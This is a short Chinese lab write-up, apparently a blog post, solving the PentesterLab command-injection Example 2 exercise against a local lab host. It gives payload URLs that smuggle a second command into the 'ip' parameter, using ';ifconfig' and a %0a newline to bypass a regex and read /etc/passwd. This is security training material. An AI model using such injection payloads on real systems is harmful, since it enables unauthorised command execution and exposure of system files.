0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全命令注入-EXP2

辰鑫chenxin 2023-04-05 阅读 51
php正则IP网络安全yyds干货盘点


我们打开靶机

选择“Example 2”


PentestLab-web安全命令注入-EXP2_正则


观察页面


PentestLab-web安全命令注入-EXP2_正则_02


我们尝试


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig


结果


PentestLab-web安全命令注入-EXP2_IP_03


我们尝试%0a


PentestLab-web安全命令注入-EXP2_php_04


于是payload为


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd


结果


PentestLab-web安全命令注入-EXP2_IP_05


我们观察靶机源码


PentestLab-web安全命令注入-EXP2_php_06


使用了正则来匹配IP地址

可以使用%0a进行截断

举报

相关推荐

PentestLab-web安全SQL注入-EXP2

sqlpython多行注释网络安全yyds干货盘点

PentestLab-web安全目录穿越-EXP2

php修改文件文件名网络安全yyds干货盘点

PentestLab-web安全XML测试-EXP2

xmlphp单引号网络安全yyds干货盘点

PentestLab-web安全LDAP测试-EXP2

用户名数据php网络安全yyds干货盘点

PentestLab-web安全文件包含-EXP2

php文件包含后缀名网络安全yyds干货盘点

PentestLab-web安全命令注入-EXP1

php网络安全yyds干货盘点

PentestLab-web安全文件上传测试-EXP2

php文件名上传网络安全yyds干货盘点

PentestLab-web安全SQL注入-EXP5

sqlsql注入php网络安全yyds干货盘点

PentestLab-web安全SQL注入-EXP6

sqlphp正则网络安全yyds干货盘点

PentestLab-web安全目录穿越-EXP3

后缀名php文件名网络安全yyds干货盘点
0 条评论